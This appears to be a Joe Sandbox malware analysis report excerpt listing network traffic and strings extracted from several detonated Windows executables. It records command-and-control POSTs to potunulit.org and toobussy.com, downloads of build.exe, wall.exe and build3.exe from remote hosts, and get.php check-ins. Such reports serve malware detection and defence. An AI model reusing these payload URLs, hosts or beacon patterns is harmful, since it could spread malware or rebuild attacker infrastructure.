                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmunha.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://abbieik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://twffpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://posgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxdusu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txpvrw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cnrubgqxe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkgvgdoeib.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtvwjmn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrtajytrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pracwvkxcx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guticvumry.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlvbrwqaym.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doogjdva.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdxqlp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqpjv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edswtiwran.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avagk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekrokkyh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: potunulit.org
                Source: global trafficHTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohekid.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gliyf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: potunulit.org
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddkeivkauy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geqxiqye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uchjq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijkkn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueyvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwgtd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikayx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://locgo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmhiudo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wllfdrn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axpbq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhvrftyg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuolikyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckaets.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjpgpfxidh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96208&key=227c6fc9449cfe3c9f4c724f3db9a31c HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jeurjivh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: toobussy.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96214&key=e4f0ccf8f99814617f7408b4efdac436 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96240&key=deff0eaee8fdc312425fe215c7a4b183 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96258&key=02c43f8de48edc98e314a991a9a53167 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umhlphjsj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96274&key=9871b54c626752ba88e7b6e5c02b2e5c HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppqeamjdcq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96284&key=24861507852bad85284d69022e85886c HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgehtfbmpd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: toobussy.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96300&key=cd8038b120ac558b521ed1acd844b6e9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: as.imgjeoigaa.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=96310&key=aa6f55198e3f46ac1c8cf076320ddea0 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Content-Length: 160Host: as.imgjeoigaa.com
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewIP Address: 104.21.18.99 104.21.18.99
                Source: Joe Sandbox ViewIP Address: 104.21.18.99 104.21.18.99
                Source: unknownNetwork traffic detected: IP country count 14
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe$run
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exerun0a2c
                Source: 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exeruned57Q
                Source: explorer.exe, 00000003.00000000.568006829.00007FF883839000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
                Source: explorer.exe, 00000003.00000000.568006829.00007FF883839000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
                Source: 9721.exe, 00000006.00000002.653103615.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000006.00000003.635132956.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.641151077.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.660779350.0000000000653000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 0000000D.00000003.650181194.0000000000653000.00000004.00000020.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.652053419.000000000077A000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000003.657203262.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661648739.0000000000588000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000003.667507188.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686758804.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: 9721.exe, 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                Source: 9721.exe, 00000014.00000003.668701027.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
                Source: 9721.exe, 00000014.00000003.668848133.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
                Source: 9721.exe, 00000014.00000003.668881844.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
                Source: 9721.exe, 00000014.00000003.668912801.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
                Source: 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: 9721.exe, 00000014.00000003.668951760.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
                Source: 9721.exe, 00000014.00000003.668978838.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
                Source: 9721.exe, 00000014.00000003.669007990.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
                Source: 9721.exe, 00000014.00000003.669045171.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
                Source: 9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/
                Source: 9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
                Source: 9721.exe, 00000014.00000002.798394056.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runD
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runo
                Source: 9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe02
                Source: 46F.exe, 00000019.00000002.798522186.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exeG
                Source: 9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exeW
                Source: 9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exerun
                Source: 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exeruna2cG
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exerund57
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/lancer/get.php
                Source: 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/lancer/get.phpn
                Source: 46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/lancer/get.phpp
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php0
                Source: 9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
                Source: 9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueX
                Source: 9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.phpep
                Source: 9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686758804.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
